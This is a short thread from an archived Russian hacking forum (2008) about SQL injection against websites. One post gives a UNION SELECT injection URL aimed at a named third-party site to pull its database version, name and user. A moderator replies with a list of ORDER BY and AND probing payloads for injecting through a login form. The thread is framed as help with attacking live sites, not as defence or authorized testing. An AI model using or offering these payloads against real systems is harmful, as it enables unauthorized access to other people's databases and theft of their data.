1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

SQL непохек

Тема в разделе "Web-хакинг, уязвимости CMS, эксплоиты", создана пользователем Ap0str0F, 18 сен 2008.

  1. Ap0str0F

    Ap0str0F Продвинутый

    Регистрация:
    10 июн 2008
    Сообщения:
    0
    Симпатии:
    30
    Баллы:
    0
    Парни, мне б тоже растолковали:
    Код:
    http://site.lookmy.info/index.php?id=900&show=news&newsid=-2721+union+select+concat_ws(0x3b,version(),database(),user()),2,3
    Чё эт я ему не нравлюсь?!)) ..
     
  2. Dr. MefistO

    Dr. MefistO Крывіч Глобальный модератор

    Регистрация:
    3 авг 2008
    Сообщения:
    152
    Симпатии:
    254
    Баллы:
    0
    В СКУЛе только начал разбираться, и возникли вопросы:
    Имеется форма с полями login и password. Первое поле уязвимо. Выдает, что "Warning: mysql_num_rows()" при подстановке 1'.
    Пытаюсь подобрать столбцы, но не получается. Точнее не могу понять: нужно ли дописывать /* в конце при вводе текста в поле?
    [​IMG]
    А то, если оставлять второе поле пустым, ничего не происходит, но если его заполнить, то постоянно вылезает ошибка. Мне кажется, что второй параметр мешает запросу. Научите ламера...
     
  3. Hookman

    Hookman Developer Глобальный модератор

    Регистрация:
    4 окт 2008
    Сообщения:
    93
    Симпатии:
    220
    Баллы:
    0
    Желательно бы ссыль.

    Попробуй

    Код:
    1'+order+by+1--
    1'+order+by+111--
    
    1+order+by+1--
    1+order+by+111--
    
    1+order+by+1/*
    1+order+by+111/*
    
    1+and+0/*
    1+and+1/*
    
    1+and+1--
    1+and+0--
     

Поделиться этой страницей